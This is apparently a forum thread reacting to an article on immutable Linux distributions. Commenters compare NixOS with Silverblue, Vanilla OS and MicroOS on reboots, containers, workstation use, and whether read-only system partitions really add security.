Introduction to immutable Linux systems

Midly NixOS related :slight_smile:


Awesome! Thank you.

One detail:

  • packages changes are applied on the next boot
  • having to reboot after a change is annoying.

I’m pretty sure I often make changes to NixOS packages without rebooting!

1 Like

I’ll make it clearier that this is the general “cons”, but that NixOS is doing things correctly so it’s not annoying.


Having to reboot after package installation seems to me very annoying. But I assume the main usecase here is not laptop / workstation use, but for servers running in the cloud or something. Servers running container workloads perhaps?

1 Like

Not really, Silverblue is meant to be used for workstations, same for Vanilla OS, and MicroOS to some extent.

That’s why they provide devtool / distrobox, you are supposed to manage the software you need using rootless containers. That’s also something NixOS handles natively, a nix-shell or nix profile…

1 Like

I don’t understand the benefit for this way of working (I am now talking about the other distributions than NixOS). I used to be on OpenSUSE and switched to NixOS only recently. It seems that in their future they will switch entirely to this type of distribution. As a workstation user, the downside seems much larger than the upside. I thought it was a price to pay for their approach to security and provenance, which may make sense for server workloads in certain enterprise contexts. But as a workstation user, I think NixOS approach will be more convenient.


In any case, this was a well written and interesting article! Thank you!

Android works like this too, it’s working fine but the whole ecosystem was built in this environment since the beginning, no much friction.

Maybe they want to enforce an android style approach, and this is a way. Motivating users to use flatpak or rootless containers instead of having to touch the system itself.

The whole idea is interesting, one should let the system handle the boot, the display, drivers etc… and everything that isn’t used to make the computer in a working state should be done in user land. But we are far from that! :frowning:

1 Like

thanks, good writeup intro about immutable linux system!

In my view ( and I dabled a little only on silverblue and microos ), the only reason silverblue makes sense (and in that space it makes a lot of sense) is on “kiosk” like computers, where no customization is wanted. ( and of course, no customization needed in terms of drivers or whatnot )

microos is a good system, but … I see it as a normal system with just RO partitions. ( discarding here the purpose of being for containers ). Particulary, tumbleweed can be made a immutable system, by installing the “transactional server” role.

nixos is nixos (and guix), and I also think its the right way to do things. Although and in an offtopic, I am seeing a lot of marketting kinda like “nixos is the new arch”, and I really don’t like it. Its better to be honest about it, say the pros and the cons… and not have this “its the holy grail” hype. Similar to how silverblue is “The Future” hype in lots of places I read. (or maybe I am reading the wrong places :slight_smile: )

thanks for mentioning something that puzzles me too, which is why immutability = security. I don’t get it, breaking immutability in silverblue is one ostree param away (i don’t remember the exact name, but there is a param to make changes live, making it temporarily RW). in microos, is a marking the btrfs snapshot rw away. on nixos, is a mount -o remount,rw /nix/store away… If a hacker can get root, making the RO into RW is the easiest step.
At least something like “kernel before opening file, would check the package shasum and verify it if it is correct”… it could still be hackable, but much much harder.

1 Like